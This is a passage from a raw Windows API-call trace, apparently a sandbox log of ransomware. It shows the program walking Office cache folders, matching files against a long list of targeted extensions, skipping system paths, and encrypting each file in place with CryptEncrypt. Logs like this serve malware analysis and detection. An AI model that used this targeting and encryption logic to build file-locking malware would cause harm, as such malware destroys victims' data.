users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0021.381] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1450) returned 1 [0021.381] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5d2, lpName=0x0) returned 0x230 [0021.381] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.381] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0xa0000 [0021.382] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.382] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0xa0000 [0021.383] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000, pdwDataLen=0x31ce070*=0x5aa, dwBufLen=0x5b0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x5b0) returned 1 [0021.383] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5b0) returned 1 [0021.384] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.385] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.385] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d2) returned 0xa0000 [0021.385] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0021.385] CryptHashData (hHash=0x368430, pbData=0xa05ac, dwDataLen=0x4, dwFlags=0x0) returned 1 [0021.385] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0021.385] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0021.386] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5d2) returned 1 [0021.386] LocalFree (hMem=0x36ea40) returned 0x0 [0021.386] CryptDestroyHash (hHash=0x368430) returned 1 [0021.386] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.386] CloseHandle (hObject=0x230) returned 1 [0021.386] CloseHandle (hObject=0x22c) returned 1 [0021.387] CryptDestroyKey (hKey=0x3683b0) returned 1 [0021.387] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.387] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.387] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", pszFile="PubLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" [0021.387] PathFindExtensionW (pszPath="PubLR.cab") returned=".cab" [0021.387] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0021.387] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0021.387] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0021.387] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=9958388) returned 1 [0021.387] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x97f422, lpName=0x0) returned 0x230 [0021.387] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.387] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x970000, dwNumberOfBytesToMap=0xf3f4) returned 0xa0000 [0021.389] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.389] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97f3f4) returned 0x3240000 [0021.390] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x97f3f4, dwBufLen=0x97f400 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x97f400) returned 1 [0021.581] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x97f400) returned 1 [0021.679] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0021.739] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.739] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x970000, dwNumberOfBytesToMap=0xf422) returned 0xa0000 [0021.743] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0021.743] CryptHashData (hHash=0x368430, pbData=0xaf3fc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0021.743] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0021.743] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0021.743] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0xf422) returned 1 [0021.744] LocalFree (hMem=0x36ea40) returned 0x0 [0021.744] CryptDestroyHash (hHash=0x368430) returned 1 [0021.744] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.744] CloseHandle (hObject=0x230) returned 1 [0021.744] CloseHandle (hObject=0x22c) returned 1 [0021.928] CryptDestroyKey (hKey=0x3683b0) returned 1 [0021.928] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.928] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.928] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" [0021.928] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0021.928] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0021.928] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0021.928] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0021.928] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1608) returned 1 [0021.928] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x672, lpName=0x0) returned 0x230 [0021.928] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.929] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x648) returned 0xa0000 [0021.930] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.930] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x648) returned 0xa0000 [0021.931] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000, pdwDataLen=0x31ce070*=0x648, dwBufLen=0x650 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x650) returned 1 [0021.931] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x650) returned 1 [0021.933] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.934] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.934] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x672) returned 0xa0000 [0021.935] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0021.935] CryptHashData (hHash=0x368430, pbData=0xa064c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0021.935] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0021.935] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0021.935] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x672) returned 1 [0021.938] LocalFree (hMem=0x36ea40) returned 0x0 [0021.938] CryptDestroyHash (hHash=0x368430) returned 1 [0021.938] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.938] CloseHandle (hObject=0x230) returned 1 [0021.938] CloseHandle (hObject=0x22c) returned 1 [0021.939] CryptDestroyKey (hKey=0x3683b0) returned 1 [0021.939] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0021.939] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0021.939] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0021.939] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.939] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-001A-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C" [0021.939] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0021.939] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0021.939] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0021.939] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0021.939] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*" [0021.939] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0021.941] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.941] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.941] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.941] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.941] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.941] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", pszFile="OutlkLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" [0021.941] PathFindExtensionW (pszPath="OutlkLR.cab") returned=".cab" [0021.941] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0021.941] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0021.941] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0021.941] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=14819276) returned 1 [0021.941] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe21ff2, lpName=0x0) returned 0x230 [0021.941] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.941] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xe20000, dwNumberOfBytesToMap=0x1fcc) returned 0xa0000 [0021.943] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.943] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe21fcc) returned 0x3240000 [0021.944] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0xe21fcc, dwBufLen=0xe21fd0 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0xe21fd0) returned 1 [0022.231] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0xe21fd0) returned 1 [0022.368] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0022.448] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.449] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xe20000, dwNumberOfBytesToMap=0x1ff2) returned 0xa0000 [0022.450] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0022.450] CryptHashData (hHash=0x368430, pbData=0xa1fcc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0022.450] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0022.450] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0022.450] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1ff2) returned 1 [0022.450] LocalFree (hMem=0x36ea40) returned 0x0 [0022.450] CryptDestroyHash (hHash=0x368430) returned 1 [0022.450] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.451] CloseHandle (hObject=0x230) returned 1 [0022.451] CloseHandle (hObject=0x22c) returned 1 [0022.640] CryptDestroyKey (hKey=0x3683b0) returned 1 [0022.640] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0022.641] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.641] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", pszFile="OutlookMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" [0022.641] PathFindExtensionW (pszPath="OutlookMUI.msi") returned=".msi" [0022.641] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0022.641] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0022.641] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0022.641] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", pszFile="OutlookMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" [0022.641] PathFindExtensionW (pszPath="OutlookMUI.xml") returned=".xml" [0022.641] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0022.641] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0022.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0022.641] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=3186) returned 1 [0022.641] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xca2, lpName=0x0) returned 0x230 [0022.641] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0022.641] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc72) returned 0xa0000 [0022.647] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0022.647] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc72) returned 0xa0000 [0022.649] CryptEncrypt (in: 